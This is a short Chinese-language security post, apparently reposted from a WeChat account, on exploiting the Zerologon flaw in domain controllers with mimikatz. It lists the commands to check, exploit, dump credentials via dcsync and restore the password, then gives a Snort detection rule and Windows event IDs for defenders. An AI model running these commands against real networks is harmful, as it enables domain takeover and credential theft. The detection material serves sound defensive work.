mimikatz利用zerologon攻擊域控服務器相關命令（附藍隊自查方案）

0x01 前言

mimikatz 20200918版本支持經過zerologon漏洞攻擊域控服務器。下載連接以下https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200918-fix

官方利用截圖以下

mimikatz相關命令

1. lsadump::zerologon /target:dc.hacke.testlab /account:dc$poc
2. lsadump::zerologon /target:dc.hacke.testlab /account:dc$ /exploit 經過zerologon漏洞攻擊域控服務器
3. lsadump::dcsync
4. lsadump::postzerologon /target:conttosson.locl /account:dc$ #恢復密碼

snort 檢測規則

alert tcp any any -> any ![139,445] (msg:"Possible Mimikatz Zerologon Attempt"; flow:established,to_server; content:"|00|"; offset:2; content:"|0f 00|"; distance:22; within:2; fast_pattern; content:"|00 00 00 00 00 00 00 00 ff ff 2f 21|"; within:90; reference:url,https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200916; classtype:attempted-admin; sid:20166330; rev:2; metadata:created_at 2020_09_19;)

pcap包

利用zerologon漏洞攻擊域控的數據包，方便同窗們寫完規則作測試pcap github下載地址

windows事件管理器自查

在未打補丁的域控，重點查看windows事件管理器中，eventid爲4742或者4624, 5805

在windows 8月更新中，新增事件ID 5829，5827，5828，5830，5831。藍隊能夠重點關注這幾個事件ID以方便自查

1. 當在初始部署階段容許存在漏洞的Netlogon安全通道鏈接時，將生成事件ID 5829。
2. 管理員能夠監控事件ID 5827和5828，這些事件ID在存在漏洞的Netlogon鏈接被拒絕時觸發
3. 5830，5831  若是「域控制器：容許易受攻擊的Netlogon安全通道鏈接」組策略容許鏈接。

mimikatz經過zerologon攻擊成功後，將會留下事件id爲4648。

參考

1. How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472 https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc
2. Detecting the Zerologon vulnerability in LogPoint     https://www.logpoint.com/en/blog/detecting-zerologon-vulnerability-in-logpoint/
   
3. https://gist.githubusercontent.com/silence-is-best/435ddb388f872b1a2e332b6239e9150b/raw/8064d33f62d5983130d3d946aac28ea00aaf6c4a/gistfile1.txt

禁止非法，後果自負

歡迎關注公衆號：web安全工具庫

本文分享自微信公衆號 - web安全工具庫（websec-tools）。
若有侵權，請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」，歡迎正在閱讀的你也加入，一塊兒分享。